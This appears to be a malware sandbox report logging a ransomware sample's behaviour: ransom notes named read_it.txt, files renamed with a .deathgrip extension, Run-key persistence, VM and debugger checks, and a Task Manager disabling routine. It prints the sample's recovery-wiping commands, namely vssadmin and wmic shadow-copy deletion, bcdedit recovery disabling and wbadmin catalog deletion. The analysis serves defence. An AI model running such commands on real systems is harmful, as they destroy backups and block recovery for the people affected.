                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\Accessories\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\Accessories\Internet Explorer.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Administrative Tools.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\System Tools\computer.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\System Tools\File Explorer.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateTaskJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: c:\users\user\desktop\4wx72yflka.exeJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD656EF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00007FF6DD656EF0
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\vds.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\main.exe Memory allocated: 8B0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\main.exe Memory allocated: 1A530000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2D10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1AD10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2DF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1ADF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2BC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1ABC0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\vds.exe File opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\Desktop\main.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Window / User API: threadDelayed 1012
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Window / User API: threadDelayed 2262
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Window / User API: threadDelayed 1436
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Window / User API: threadDelayed 395
                  Source: C:\Users\user\Desktop\Mai.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_2-16369
                  Source: C:\Users\user\Desktop\Mai.exe API coverage: 0.6 %
                  Source: C:\Users\user\Desktop\main.exe TID: 7696 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7820 Thread sleep count: 1012 > 30
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2844 Thread sleep count: 2262 > 30
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7088 Thread sleep count: 280 > 30
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 4676 Thread sleep count: 1436 > 30
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7552 Thread sleep count: 395 > 30
                  Source: C:\Windows\System32\svchost.exe TID: 2296 Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 5256 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3712 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Last function: Thread delayed
                  Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0004BA74 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004BA74
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0005D2A0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005D2A0
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0006C358 FindFirstFileExA,0_2_0006C358
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 2_2_00007FF6DD667E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF6DD667E4C
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 2_2_00007FF6DD6588D0 FindFirstFileExW,FindClose,2_2_00007FF6DD6588D0
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 2_2_00007FF6DD671EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6DD671EE4
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0005F67D VirtualQuery,GetSystemInfo,0_2_0005F67D
                  Source: C:\Users\user\Desktop\Mai.exe File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dll
                  Source: C:\Users\user\Desktop\Mai.exe File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\sqlite3.dll
                  Source: C:\Users\user\Desktop\Mai.exe File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\unicodedata.pyd
                  Source: C:\Users\user\Desktop\Mai.exe File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\
                  Source: C:\Users\user\Desktop\Mai.exe File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140_1.dll
                  Source: C:\Users\user\Desktop\Mai.exe File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140.dll
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: System32\vmGuestLib.dllz
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: System32\vmGuestLib.dll
                  Source: 4wx72yFLka.exe, 00000000.00000003.1466999791.00000000026C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252092172.000001995DFFC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1548165458.000001995DFAD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1536553084.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2605770097.000001995E02A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1540473126.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545270960.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2302459753.000001995E01E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWempr%SystemRoot%\system32\mswsock.dll
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxmrxnp.dllr
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxmrxnp.dll
                  Source: svchost.exe, 0000001E.00000002.3448004153.00000286A1E42000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMWARE
                  Source: Mai.exe, 00000004.00000003.1536808200.000001995DEF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW+
                  Source: 4wx72yFLka.exe, 00000000.00000003.1466999791.00000000026C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe API call chain: ExitProcess graph end node graph_0-24847
                  Source: C:\Users\user\Desktop\main.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0006085A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0006085A
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_00069000 mov eax, dword ptr fs:[00000030h] 0_2_00069000
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0006D040 GetProcessHeap,0_2_0006D040
                  Source: C:\Users\user\Desktop\main.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000609ED SetUnhandledExceptionFilter,0_2_000609ED
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_00060BDA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00060BDA
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_00064E3F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00064E3F
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 2_2_00007FF6DD65C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6DD65C57C
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 2_2_00007FF6DD65C760 SetUnhandledExceptionFilter,2_2_00007FF6DD65C760
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 2_2_00007FF6DD65BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6DD65BCE0
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 2_2_00007FF6DD66ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6DD66ABD8
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 4_2_00007FFBA457ADF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA457ADF0
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 4_2_00007FFBA457B758 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFBA457B758
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 4_2_00007FFBA46CCD20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA46CCD20
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 4_2_00007FFBA471B970 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFBA471B970
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 4_2_00007FFBA471B3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA471B3A0
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 4_2_00007FFBA4733058 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFBA4733058
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 4_2_00007FFBA4732A90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA4732A90
                  Source: C:\Users\user\Desktop\main.exe Memory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Process created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe"
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
                  Source: C:\Users\user\Desktop\Mai.exe Process created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe"
                  Source: C:\Users\user\Desktop\main.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\Desktop\Mai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_00060676 cpuid 0_2_00060676
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_0005BFAF
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\certifi VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info VolumeInformation
                  Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_ctypes.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_bz2.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_lzma.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-console-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-2-0.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processenvironment-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\libffi-8.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562 VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_socket.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\select.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_queue.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_ssl.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_asyncio.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_overlapped.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pyexpat.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\win32 VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\_hashlib.pyd VolumeInformation
                  Source: C:\Users\user\Desktop\Mai.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32 VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Windows\System32\vds.exe Queries volume information: \Device\CdRom0 VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt VolumeInformation
                  Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Roaming\read_it.txt VolumeInformation
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0005EEDC GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0005EEDC
                  Source: C:\Users\user\Desktop\Mai.exe Code function: 2_2_00007FF6DD676370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,2_2_00007FF6DD676370
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Code function: 0_2_0004C345 GetVersionExW,0_2_0004C345
                  Source: C:\Users\user\Desktop\main.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: svchost.exe.3.dr, Program.cs .Net Code: DisableTaskManager
